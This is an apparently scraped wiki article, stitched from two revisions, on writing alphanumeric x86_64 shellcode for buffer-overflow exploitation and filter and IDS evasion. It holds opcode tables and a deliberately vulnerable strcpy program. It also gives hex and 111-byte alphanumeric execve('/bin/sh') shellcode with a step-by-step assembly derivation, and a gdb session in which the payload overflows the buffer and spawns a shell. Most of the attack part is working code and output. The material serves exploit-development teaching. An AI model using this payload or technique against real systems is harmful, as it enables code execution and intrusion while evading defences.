{{code|text=<syntaxhighlight lang="asm"><br />
xor %ss:0x30(%rcx), %rax<br />
xor %rax, %ss:0x30(%rcx)<br />
</syntaxhighlight>}}<br />
<br />
xor %rbx into the stack segment and then xor it against rbx to zero. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %rbx, %ss:0x30(%rcx)<br />
xor %ss:0x30(%rcx), %rbx<br />
</syntaxhighlight>}}<br />
<br />
Rezero the stack segment with %rax. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rdx<br />
pop %rax<br />
xor %ss:0x30(%rcx), %rax<br />
xor %rax, %ss:0x30(%rcx)<br />
</syntaxhighlight>}}<br />
<br />
As before, xor %rbp into the stack segment and then xor it against rbp to zero. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %rbp, %ss:0x30(%rcx)<br />
xor %ss:0x30(%rcx), %rbp<br />
</syntaxhighlight>}}<br />
<br />
= 64 bit shellcode: Conversion to alphanumeric code =<br />
* Because of the limited instruction set, the conversion requires many '''mov emulations''' via '''xor''', '''mul''', '''movslq''', '''push''', and '''pop'''.<br />
== bof.c ==<br />
{{info|This is a modified version of bof.c to allow for 200 bytes because the length of the final shellcode exceeds 100 bytes.}}<br />
{{code|text=<source lang="c"><br />
#include <stdlib.h><br />
#include <stdio.h><br />
#include <string.h><br />
<br />
int main(int argc, char *argv[]){<br />
char buffer[200];<br />
strcpy(buffer, argv[1]);<br />
return 0;<br />
}<br />
</source>}}<br />
<br />
== Starting shellcode (64-bit execve /bin/sh) ==<br />
{{info|This was converted to shellcode from the example in 64 bit linux assembly}}<br />
* execve('/bin/sh');<br />
{{code|text=<source lang="asm"><br />
.section .data<br />
.section .text<br />
.globl _start<br />
_start:<br />
<br />
# a function is f(%rdi, %rsi, %rdx, %rcx, %r8, %r9).<br />
# Use zeroed memory to zero out %rsi, %rdi, %rdx<br />
xor %rdi, %rdi<br />
push %rdi<br />
push %rdi<br />
pop %rsi<br />
pop %rdx<br />
<br />
# Store '/bin/sh\0' in %rdi<br />
movq $0x68732f6e69622f6a, %rdi<br />
shr $0x8,%rdi<br />
push %rdi<br />
push %rsp<br />
pop %rdi<br />
push $0x3b<br />
pop %rax<br />
syscall # execve('/bin/sh', null, null)<br />
# function no. is 59/0x3b - execve()<br />
</source>}}<br />
<br />
* execve('/bin/sh') <br />
"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"<br />
<br />
== Shellcode Analysis ==<br />
'''Immediately before the syscall:'''<br />
* %rax is set to 0x3b<br />
* %rdi is a pointer to '/bin/sh\0'<br />
* %rsi and %rdx are null<br />
To reproduce this, because the syscall is binary, it must be written to a location that will eventually be executed ahead of currently executing code. The '''xor''' and '''imul''' instructions can then be used to set values on registers.<br />
<br />
==Stack Analysis==<br />
{{info|These buffer dumps have been shortened for brevity and readability.}}<br />
[root@ares bha]# gdb -q ./bof<br />
Reading symbols from /home/hatter/bha/bof...(no debugging symbols found)...done.<br />
(gdb) r $(perl -e 'print "A"x232;')<br />
Starting program: /home/hatter/bha/bof $(perl -e 'print "A"x232;')<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x0000000000400525 in main ()<br />
(gdb) x/500x $rsp <br />
'''0x7fffffffe3c8''': 0x41414141 0x41414141 0x41414141 0x41414141<br />
0x7fffffffe3d8: 0xffffe400 0x00007fff 0x00000000 0x00000002<br />
..........................<br />
0x7fffffffe708: 0x2f656d6f 0x68726f76 0x2f736565 0x2f616862<br />
0x7fffffffe718: 0x00666f62 '''0x41414141 0x41414141 0x41414141'''<br />
0x7fffffffe728: '''0x41414141 0x41414141 0x41414141 0x41414141'''<br />
<br />
* The formula to determine the offset to begin overwriting data from the stack pointer is '''([[return address]] + [[shellcode]] length) - %rsp'''.<br />
{| class="wikitable"<br />
|-<br />
|'''Operation'''<br />
|<b>Value</b><br />
|<b>Comments</b><br />
|-<br />
|<center><br />
<br />
<br />
'''+'''<br />
<br />
'''-'''</center><br />
|0x7fffffffe726<br />
<br />
0x71<br />
<br />
0x7fffffffe3c8 <br />
|<br />
:[[return address]]<br />
<br />
:[[shellcode]] length (113 characters) <br />
<br />
:%rsp<br />
|-<br />
<br />
|-<br />
|<center>'''='''</center><br />
|<b>0x3cf</b><br />
|<br />
:'''Calculated Offset from %rsp at time of overflow'''<br />
|-<br />
|}<br />
<br />
==The Offset==<br />
* To prepare for '''xor''' and '''imul''' manipulations, 0x5a is placed into %rax and %rsp is moved into %rcx.<br />
{{code|text=<source lang="asm"><br />
# Set %rcx as stack pointer <br />
# and align %rsp <br />
push $0x5a<br />
push %rsp<br />
pop %rcx<br />
pop %rax<br />
</source>}}<br />
* Preparing for imul, an '''xor''' is used to place 0x0f into %rax, then push %rax to the stack.<br />
{{code|text=<source lang="asm"><br />
# Get magic offset and store in %rdi<br />
xor $0x55, %al<br />
push %rax # 0x0f on the stack now.<br />
</source>}}<br />
<br />
* Because 0x41 * 0x0f = 0x3cf (975), the offset can be calculated in purely alphanumeric form. Modify this as code distances itself from the stack pointer during an exploit. The offset is stored in %rdi after setting back the stack pointer.<br />
{{code|text=<source lang="asm"><br />
pop %rax # add back to %esp<br />
imul $0x41, (%rcx), %edi # %rdi = 0x3cf, a "magic offset" for us<br />
</source>}}<br />
<br />
==The Syscall==<br />
* Now that the offset to an address in front of executing instructions has been obtained, 4 bytes must be nulled for the new instructions to be written:<br />
{{code|text=<source lang="asm"><br />
movslq (%rcx,%rdi,1), %rsi<br />
xor %esi, (%rcx,%rdi,1)<br />
</source>}}<br />
<br />
* This next xor comes out to 0x0000050f, which when moved onto the stack becomes 0x0f050000. 0x0f05 is the machine code for a '''syscall'''.<br />
{{code|text=<source lang="asm"><br />
push $0x3030474a<br />
pop %rax<br />
xor $0x30304245, %eax<br />
</source>}}<br />
<br />
* The %rax register now contains 0x050f. Put 0x0f050000 at (%rcx) - then set the stack pointer back.<br />
{{code|text=<source lang="asm"><br />
push %rax<br />
pop %rax # Garbage reg<br />
</source>}}<br />
<br />
* A '''mov emulation''' is used to mov 0x0f05 from (%rcx) to %rcx + %rdi through the %rsi register, writing the syscall instructions:<br />
{{code|text=<source lang="asm"><br />
movslq (%rcx), %rsi<br />
xor %esi, (%rcx,%rdi,1)<br />
</source>}}<br />
<br />
==Arguments==<br />
===Stack Space===<br />
* Zero out a '''qword''' of data starting at %rcx + 0x30 (48 in decimal)<br />
{{code|text=<source lang="asm"><br />
# Allocate stack space<br />
movslq 0x30(%rcx), %rsi<br />
xor %esi, 0x30(%rcx)<br />
movslq 0x34(%rcx), %rsi<br />
xor %esi, 0x34(%rcx)<br />
</source>}}<br />
<br />
===Register Initialization===<br />
* The %rdx, %rdi, and %rsi registers are used for the '''execve()''' syscall. These are zeroed out to initialize their values using the stack space previously allocated.<br />
{{code|text=<source lang="asm"><br />
# Zero rdx, rsi, and rdi<br />
movslq 0x30(%rcx), %rdi<br />
movslq 0x30(%rcx), %rsi<br />
push %rdi<br />
pop %rdx<br />
</source>}}<br />
<br />
===String Argument===<br />
* '''/bin''' is placed onto the stack at the space allocated at %rcx + 0x30.<br />
{{code|text=<source lang="asm"><br />
push $0x5a58555a<br />
pop %rax<br />
xor $0x34313775, %eax<br />
xor %eax, 0x30(%rcx)<br />
</source>}}<br />
* '''/sh\0''' is placed onto the stack at the space allocated at %rcx + 0x34.<br />
{{code|text=<source lang="asm"><br />
push $0x6a51475a<br />
pop %rax<br />
xor $0x6a393475, %eax<br />
xor %eax, 0x34(%rcx) <br />
</source>}}<br />
* '''xor''' is used as a '''mov emulation''' to place '/bin/sh\0' into %rdi.<br />
{{code|text=<source lang="asm"><br />
xor 0x30(%rcx), %rdi<br />
</source>}}<br />
* Set the stack pointer back so %rsp = %rcx + 8 so that the push of %rdi does not overwrite (%rcx). Push '/bin/sh\0'.<br />
{{code|text=<source lang="asm"><br />
pop %rax<br />
push %rdi<br />
</source>}}<br />
<br />
===Final Registers===<br />
* %rsi and %rdx are '''0'''. First, push a byte to meet the sign requirement for '''movslq''', then zero %rdi.<br />
{{code|text=<source lang="asm"><br />
push $0x58<br />
movslq (%rcx), %rdi<br />
xor (%rcx), %rdi <br />
</source>}}<br />
* Align %rsp and %rcx, then use a mov emulation to place %rsp into %rdi. %rdi then contains a pointer to '/bin/sh\0'.<br />
{{code|text=<source lang="asm"><br />
pop %rax<br />
push %rsp<br />
xor (%rcx), %rdi<br />
</source>}}<br />
* %rax is set to 59 or '''0x3b''' for the '''execve()''' syscall.<br />
{{code|text=<source lang="asm"><br />
xor $0x63, %al<br />
</source>}}<br />
'''Final registers:'''<br />
* %rax = 0x3b<br />
* %rdi = pointer to '/bin/sh\0'<br />
* %rsi = null<br />
* %rdx = null<br />
<br />
==Final Code==<br />
* x86_64 alphanumeric execve('/bin/sh',null,null) - 111 bytes:<br />
'''jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c'''<br />
{{info|Some assemblers prefer the '#' character to the ';' character for comments. User may have to find and replace to get it to assemble properly.}}{{code|text=<source lang="asm"><br />
.global _start<br />
.text<br />
_start:<br />
; Set %rcx as stack pointer <br />
; and align %rsp <br />
push $0x5a<br />
push %rsp<br />
pop %rcx<br />
pop %rax<br />
<br />
; Get magic offset and store in %rdi<br />
xor $0x55, %al<br />
push %rax ; 0x14 on the stack now.<br />
pop %rax ; add back to %esp<br />
imul $0x41, (%rcx), %edi ; %rdi = 0x3cf, a "magic offset" for us<br />
; This is decimal value 975.<br />
; If this is too low/high, suggest a <br />
; modification to xor of %al for <br />
; changing the imul results<br />
<br />
; Write the syscall <br />
movslq (%rcx,%rdi,1), %rsi<br />
xor %esi, (%rcx,%rdi,1) ; 4 bytes have been nulled<br />
push $0x3030474a<br />
pop %rax<br />
xor $0x30304245, %eax<br />
push %rax<br />
pop %rax ; Garbage reg<br />
movslq (%rcx), %rsi<br />
xor %esi, (%rcx,%rdi,1)<br />
<br />
; Sycall written, set values now.<br />
; allocate 8 bytes for '/bin/sh\0'<br />
movslq 0x30(%rcx), %rsi<br />
xor %esi, 0x30(%rcx)<br />
movslq 0x34(%rcx), %rsi<br />
xor %esi, 0x34(%rcx)<br />
<br />
; Zero rdx, rsi, and rdi<br />
movslq 0x30(%rcx), %rdi<br />
movslq 0x30(%rcx), %rsi<br />
push %rdi<br />
pop %rdx<br />
<br />
; Store '/bin/sh\0' in %rdi<br />
push $0x5a58555a<br />
pop %rax<br />
xor $0x34313775, %eax<br />
xor %eax, 0x30(%rcx) ; '/bin' just went onto the stack<br />
<br />
push $0x6a51475a<br />
pop %rax<br />
xor $0x6a393475, %eax<br />
xor %eax, 0x34(%rcx) ; '/sh\0' just went onto the stack<br />
xor 0x30(%rcx), %rdi ; %rdi now contains '/bin/sh\0'<br />
<br />
<br />
pop %rax<br />
push %rdi<br />
<br />
push $0x58<br />
movslq (%rcx), %rdi<br />
xor (%rcx), %rdi ; %rdi zeroed<br />
pop %rax<br />
push %rsp<br />
xor (%rcx), %rdi<br />
xor $0x63, %al</source>}}<br />
<br />
== Successful Overflow Test ==<br />
{{info|This [[shellcode]] was tested on a modified [[Buffer_Overflows#bof.c|bof.c]] to make the buffer 200 bytes in stead of 100 bytes, as the shellcode here exceeds the original buffer size.}}<br />
<br />
[user@host bha]# gdb -q ./bof<br />
Reading symbols from /home/hatter/bha/bof...(no debugging symbols found)...done.<br />
(gdb) r `perl -e 'print "jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c" . "Y"x105 . "\x26\xe7\xff\xff\xff\x7f";'`<br />
Starting program: /home/hatter/bha/bof `perl -e 'print "jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c" . "Y"x105 .<br />
"\x26\xe7\xff\xff\xff\x7f";'`<br />
process 28444 is executing new program: /bin/bash<br />
[user@host bha]# uname -m<br />
x86_64<br />
[user@host bha]# exit<br />
exit<br />
[Inferior 1 (process 28444) exited normally]<br />
(gdb) <br />
{{exploitation}}{{programming}}{{social}}<br />
[[Category:Shellcode]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Alphanumeric_shellcode&diff=9079Alphanumeric shellcode2012-09-19T16:24:52Z<p>DPYJulietowbaijc: /* 15 byte architecture detection shellcode */</p>
<hr />
<div><center>'''Alphanumeric [[shellcode]]''' is similar to [[ascii shellcode]] in that it is used to [[filter bypass|bypass character filters]] and [[IDS evasion|evade intrusion-detection]] during [[Buffer Overflows|buffer overflow]] [[exploitation]].</center>{{info|<center>This article documents alphanumeric code on [[#15_Byte_Architecture_Detection_Shellcode|multiple architectures]], but primarily the '''64 bit''' x86 architecture.</center>}}<br />
{{prereq|[[bitwise math]], [[assembly]] and [[shellcode]].}}<br />
<br />
= Available x86_64 instructions =<br />
{{info|This chart contains '''64-bit''' alphanumeric opcodes. 32-bit alphanumeric opcodes are available at the 32-bit [[ascii shellcode]] entry. When limited only to instructions that have corresponding ascii characters; programmers must emulate other required instructions using only the instructions available.}}<br />
<br />
<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|+ Numeric<br />
|-<br />
! scope="col" | ASCII<br />
! scope="col" | Hex<br />
! scope="col" | Assembler Instruction<br />
|-<br />
! scope="row" | 0<br />
| 0x30<br />
| xor %{16bit}, (%{64bit})<br />
|-<br />
! scope="row" | 1<br />
| 0x31<br />
| xor %{32bit}, (%{64bit})<br />
|-<br />
! scope="row" | 2<br />
| 0x32<br />
| xor (%{64bit}), %{16bit}<br />
|-<br />
! scope="row" | 3<br />
| 0x33<br />
| xor (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | 4<br />
| 0x34<br />
| xor [byte], %al<br />
|-<br />
! scope="row" | 5<br />
| 0x35<br />
| xor [dword], %eax<br />
|-<br />
! scope="row" | 6<br />
| 0x36<br />
| %ss segment register<br />
|-<br />
! scope="row" | 7<br />
| 0x37<br />
| Bad Instruction!<br />
|-<br />
! scope="row" | 8<br />
| 0x38<br />
| cmp %{16bit}, (%{64bit})<br />
|-<br />
! scope="row" | 9<br />
| 0x39<br />
| cmp %{32bit}, (%{64bit})<br />
|-<br />
|}<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|-<br />
|+ Uppercase<br />
|-<br />
! scope="col" | ASCII<br />
! scope="col" | Hex<br />
! scope="col" | Assembler Instruction<br />
|-<br />
<br />
! scope="row" | A<br />
| 0x41<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | B<br />
| 0x42<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | C<br />
| 0x43<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | D<br />
| 0x44<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | E<br />
| 0x45<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | F<br />
| 0x46<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | G<br />
| 0x47<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | H<br />
| 0x48<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | I<br />
| 0x49<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | J<br />
| 0x4a<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | K<br />
| 0x4b<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | L<br />
| 0x4c<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | M<br />
| 0x4d<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | N<br />
| 0x4e<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | O<br />
| 0x4f<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | P<br />
| 0x50<br />
|push %rax<br />
|-<br />
! scope="row" | Q<br />
| 0x51<br />
|push %rcx<br />
|-<br />
! scope="row" | R<br />
| 0x52<br />
|push %rdx<br />
|-<br />
! scope="row" | S<br />
| 0x53<br />
|push %rbx<br />
|-<br />
! scope="row" | T<br />
| 0x54<br />
|push %rsp<br />
|-<br />
! scope="row" | U<br />
| 0x55<br />
|push %rbp<br />
|-<br />
! scope="row" | V<br />
| 0x56<br />
|push %rsi<br />
|-<br />
! scope="row" | W<br />
| 0x57<br />
|push %rdi<br />
|-<br />
! scope="row" | X<br />
| 0x58<br />
|pop %rax<br />
|-<br />
! scope="row" | Y<br />
| 0x59<br />
|pop %rcx<br />
|-<br />
! scope="row" | Z<br />
| 0x5a<br />
|pop %rdx<br />
|-<br />
|}<br />
<br />
<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|-<br />
|+ Lowercase<br />
|-<br />
! scope="col" | ASCII<br />
! scope="col" | Hex<br />
! scope="col" | Assembler Instruction<br />
|-<br />
<br />
! scope="row" | a<br />
| 0x61<br />
|Bad Instruction!<br />
|-<br />
! scope="row" | b<br />
| 0x62<br />
|Bad Instruction!<br />
|-<br />
! scope="row" | c <br />
| 0x63<br />
|movslq (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | d<br />
| 0x64<br />
|%fs segment register<br />
|-<br />
! scope="row" | e<br />
| 0x65<br />
| %gs segment register<br />
|-<br />
! scope="row" | f<br />
| 0x66<br />
| 16 bit operand override<br />
|-<br />
! scope="row" | g<br />
| 0x67<br />
| 16 bit ptr override<br />
|-<br />
! scope="row" | h<br />
| 0x68<br />
|push [dword]<br />
|-<br />
! scope="row" | i<br />
| 0x69<br />
|imul [dword], (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | j<br />
| 0x6a<br />
|push [byte]<br />
|-<br />
! scope="row" | k<br />
| 0x6b<br />
|imul [byte], (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | l<br />
| 0x6c<br />
|insb (%dx),%es:(%rdi)<br />
|-<br />
! scope="row" | m<br />
| 0x6d<br />
|insl (%dx),%es:(%rdi)<br />
|-<br />
! scope="row" | n<br />
| 0x6e<br />
|outsb %ds:(%rsi),(%dx)<br />
|-<br />
! scope="row" | o<br />
| 0x6f<br />
|outsl %ds:(%rsi),(%dx)<br />
|-<br />
! scope="row" | p<br />
| 0x70<br />
| jo [byte]<br />
|-<br />
! scope="row" | q<br />
| 0x71<br />
| jno [byte]<br />
|-<br />
! scope="row" | r<br />
| 0x72<br />
| jb [byte]<br />
|-<br />
! scope="row" | s<br />
| 0x73<br />
| jae [byte]<br />
|-<br />
! scope="row" | t<br />
| 0x74<br />
| je [byte]<br />
|-<br />
! scope="row" | u<br />
| 0x75<br />
| jne [byte]<br />
|-<br />
! scope="row" | v<br />
| 0x76<br />
| jbe [byte]<br />
|-<br />
! scope="row" | w<br />
| 0x77<br />
| ja [byte]<br />
|-<br />
! scope="row" | x<br />
| 0x78<br />
| js [byte]<br />
|-<br />
! scope="row" | y<br />
| 0x79<br />
| jns [byte]<br />
|-<br />
! scope="row" | z<br />
| 0x7a<br />
| jp [byte]<br />
|-<br />
|}<br />
<br />
= Alphanumeric opcode compatibility =<br />
Intercompatible opcodes are important to note due to the fact that many opcodes overlap and thus, writing [[shellcode]] that will run on both 32 bit and 64 bit x86 platforms becomes possible. <br />
<br />
== Alphanumeric inter-compatible x86 opcodes ==<br />
This chart was derived by cross referencing [[#Available_Instructions|available 64 bit instructions]] with [[Ascii_shellcode#Available_Instructions|available 32 bit instructions]].<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|+ Intercompatible x86* Alphanumeric Opcodes<br />
|-<br />
! scope="col" | Hex<br />
! scope="col" | ASCII<br />
! scope="col" | Assembler Instruction<br />
|-<br />
! scope="row" | 0x64, 0x65<br />
| d,e<br />
|[fs &#x7c; gs] prefix<br />
|-<br />
! scope="row" | 0x66, 0x67<br />
| f,g<br />
| 16bit [operand &#x7c; ptr] override<br />
|-<br />
! scope="row" | 0x68, 0x6a<br />
| h,j<br />
| push<br />
|-<br />
! scope="row" | 0x69, 0x6b<br />
| i,k<br />
| imul<br />
|-<br />
! scope="row" | 0x6c-0x6f<br />
| l-o<br />
| ins[bwd], outs[bwd]<br />
|-<br />
! scope="row" | 0x70-0x7a<br />
| p-z<br />
| Conditional Jumps<br />
|-<br />
! scope="row" | 0x30-0x35<br />
| 0-5<br />
| xor<br />
|-<br />
! scope="row" | 0x36<br />
| 6<br />
| %ss segment register<br />
|-<br />
! scope="row" | 0x38-0x39<br />
| 8,9<br />
| cmp<br />
|-<br />
! scope="row" | 0x50-0x57<br />
| P-W<br />
| push *x, *i, *p<br />
|-<br />
! scope="row" | 0x58-0x5a<br />
| XYZ<br />
| pop [*ax, *cx, *dx]<br />
|-<br />
|}<br />
<br />
Because not ''all'' opcodes are intercompatible, yet comparisons and conditional jumps ''are'' intercompatible, it is possible to determine the architecture of an x86 processor using exclusively alphanumeric opcodes. The opcodes which are specifically not compatible are limited to the 64 bit special prefixes '''0x40-0x4f''', which allow for manipulation of 64 bit registers and 8 additional 64 bit general purpose registers, '''%r8-%r15'''. By making use of these additional registers (which 32 bit processors do not have), one can perform an operation that will set a value on a different register in the two processors. Following this, a conditional statement can be made against one of the two registers to determine if the value was set. Using the '''pop''' instruction is the most effective way to set the value of a register due to instructional limitations. Using an alternative register to %rsp or %esp as the stack pointer enables the use of an effective conditional statement to determine if the value of a register is equal to the most recent thing pushed or popped from the stack.<br />
<br />
==15 byte architecture detection shellcode==<br />
{{info|This bytecode does not have a conditional jump. The reader may add this for customization based on the size and architecture of the payload that occurs after this snippet.}}<br />
This simple alphanumeric bytecode is 15 bytes long, ending in a comparison which returns '''equal''' on a 32 bit system and '''not equal''' on a 64 bit system. The conditional jump may be best reserved for the '''t''' and '''u''' instructions, '''jump if equal''' and '''jump if not equal''', respectively.<br />
<br />
* Assembled:<br />
'''TX4HPZTAZAYVH92'''<br />
<br />
* Disassembly:<br />
[root@ares bha]# objdump -d xarch32.o<br />
<br />
xarch32.o: file format elf32-i386<br />
<br />
Disassembly of section .text:<br />
00000000 <_start>:<br />
0: 54 push %esp<br />
1: 58 pop %eax<br />
2: 34 48 xor $0x48,%al<br />
4: 50 push %eax<br />
5: 5a pop %edx<br />
6: 54 push %esp<br />
7: 41 inc %ecx<br />
8: 5a pop %edx<br />
9: 41 inc %ecx<br />
a: 59 pop %ecx<br />
b: 56 push %esi<br />
c: 48 dec %eax<br />
d: 39 32 cmp %esi,(%edx)<br />
[root@ares bha]# # Returns not-equal on a 64 bit system:<br />
[root@ares bha]# objdump -d xarch64.o<br />
<br />
xarch64.o: file format elf64-x86-64<br />
<br />
<br />
Disassembly of section .text:<br />
<br />
0000000000000000 <_start>:<br />
0: 54 push %rsp<br />
1: 58 pop %rax<br />
2: 34 48 xor $0x48,%al<br />
4: 50 push %rax<br />
5: 5a pop %rdx<br />
6: 54 push %rsp<br />
7: 41 5a pop %r10<br />
9: 41 59 pop %r9<br />
b: 56 push %rsi<br />
c: 48 39 32 cmp %rsi,(%rdx)<br />
<br />
On a 64-bit system, this will not cause a segfault because (%rdx) points to somewhere inside the stack. Also notice that while this was assembled as a [[Linux]]-based ELF executable, the [[Operating System]] should not matter, as this stays within the confines of legal instructions for any x86 CPU that should not cause an access violation.<br />
<br />
{{programming}}{{exploitation}}{{social}}<br />
<br /><br />
<br />
=Alphanumeric x86_64 register value and data manipulation=<br />
<br />
Given the limited set of instructions for alphanumeric shellcode, its important to note different methods to manipulate different registers within the confines of the limited instruction set. Identifying these leads to '''mov emulations''', which make up most of the actual code.<br />
<br />
==Push: alphanumeric x86_64 registers==<br />
<br />
Alphanumeric data can be pushed in one-byte, two-byte, and four-byte quantities at once.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''One-byte, two-byte, and four-byte quantities'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| pushw [word]<br />
| \x66\x68\x##\x##<br />
| fh??<br />
|-<br />
| pushq [byte]<br />
| \x6a\x##<br />
| j?<br />
|-<br />
| pushq [dword]<br />
| \x68\x##\x##\x##\x##<br />
| h????<br />
|}<br />
<br />
<br />
Pushing the 64 bit registers RAX-RDI is done using a single upper case P-W (\x50-\x57) dependent on which register is being pushed. Prefixing with "A" (for general registers R8-R15) or "f" for 16 bit registers (AX-DI) gives access to push 32 registers using alphanumeric shellcode.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 Extended Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %rax <br />
| \x50<br />
| P<br />
|-<br />
| push %rcx<br />
| \x51<br />
| Q<br />
|-<br />
| push %rdx<br />
| \x52<br />
| R<br />
|-<br />
| push %rbx<br />
| \x53<br />
| S<br />
|-<br />
| push %rsp <br />
| \x54<br />
| T<br />
|-<br />
| push %rbp<br />
| \x55<br />
| U<br />
|-<br />
| push %rsi<br />
| \x56<br />
| V<br />
|-<br />
| push %rdi<br />
| \x57<br />
| W<br />
|}<br />
<br />
<br />
For the general registers R8-R15 "A" is prefixed to the corresponding RAX-RDI register push. <br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 General Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %r8<br />
| \x41\x50<br />
| AP<br />
|-<br />
| push %r9<br />
| \x41\x51<br />
| AQ<br />
|-<br />
| push %r10<br />
| \x41\x52<br />
| AR<br />
|-<br />
| push %r11<br />
| \x41\x53<br />
| AS<br />
|-<br />
| push %r12<br />
| \x41\x54<br />
| AT<br />
|-<br />
| push %r13<br />
| \x41\x55<br />
| AU<br />
|-<br />
| push %r14<br />
| \x41\x56<br />
| AV<br />
|-<br />
| push %r15<br />
| \x41\x57<br />
| AW<br />
|}<br />
<br />
<br />
For the 16 bit registers AX-DI "f" is prefixed to the corresponding RAX-RDI register push.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 16 bit Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %ax<br />
| \x66\x50<br />
| fP<br />
|-<br />
| push %cx<br />
| \x66\x51<br />
| fQ<br />
|-<br />
| push %dx<br />
| \x66\x52<br />
| fR<br />
|-<br />
| push %bx<br />
| \x66\x53<br />
| fS<br />
|-<br />
| push %sp<br />
| \x66\x54<br />
| fT<br />
|-<br />
| push %bp<br />
| \x66\x55<br />
| fU<br />
|-<br />
| push %si<br />
| \x66\x56<br />
| fV<br />
|-<br />
| push %di<br />
| \x66\x57<br />
| fW<br />
|}<br />
<br />
<br />
For the 16 bit general registers R8B-R15b "f" is prefixed to the corresponding R8-R15 register push.<br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Push: X86_64 16 bit General Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| push %r8w<br />
| \x66\x41\x50<br />
| fAP<br />
|-<br />
| push %r9w<br />
| \x66\x41\x51<br />
| fAQ<br />
|-<br />
| push %r10w<br />
| \x66\x41\x52<br />
| fAR<br />
|-<br />
| push %r11w<br />
| \x66\x41\x53<br />
| fAS<br />
|-<br />
| push %r12w<br />
| \x66\x41\x54<br />
| fAT<br />
|-<br />
| push %r13w<br />
| \x66\x41\x55<br />
| fAU<br />
|-<br />
| push %r14w<br />
| \x66\x41\x56<br />
| fAV<br />
|-<br />
| push %r15w<br />
| \x66\x41\x57<br />
| fAW<br />
|}<br />
<br />
==Pop: alphanumeric x86_64 registers==<br />
<br />
Pop is more limited in its range of usable registers due to the limitations of alphanumeric shellcode. This is limited to RAX, RCX, and RAX. As with push, the extended register shellcode is prefixed to access 16 bit and general registers. This gives the ability to pop a total of 12 (6 full size and 6 16 bit) registers able to be pop(ed). <br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Pop: X86_64 Extended Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| pop %rax <br />
| \x58<br />
| X<br />
|-<br />
| pop %rcx<br />
| \x59<br />
| Y<br />
|-<br />
| pop %rax<br />
| \x5a<br />
| Z<br />
|}<br />
<br />
<br />
For general registers, RAX-RCX are prefixed with "A" for the corresponding R8-R10 pop. <br />
<br />
<br />
{|border="1" cellpadding="5" cellspacing="0" align="center"<br />
|+'''Pop: X86_64 General Registers'''<br />
|-<br />
! scope="col" | Assembly<br />
! scope="col" | Hexadecimal<br />
! scope="col" | Alphanumeric ASCII<br />
|-<br />
| pop %r8 <br />
| \x41\x58<br />
| AX<br />
|-<br />
| pop %r9<br />
| \x41\x59<br />
| AY<br />
|-<br />
| pop %r10<br />
| \x41\x5a<br />
| AZ<br />
|}<br />
<br />
<br />
16 bit registers (using 0x66 or 'f' [sometimes fA] prefix):<br />
<br />
{| border="1" cellpadding="5" cellspacing="0" align="center"<br />
! Assembly<br />
! Hexadecimal<br />
! Alphanumeric ASCII <br />
|-<br />
| pop %ax<br />
| \x66\x58<br />
| fX<br />
|-<br />
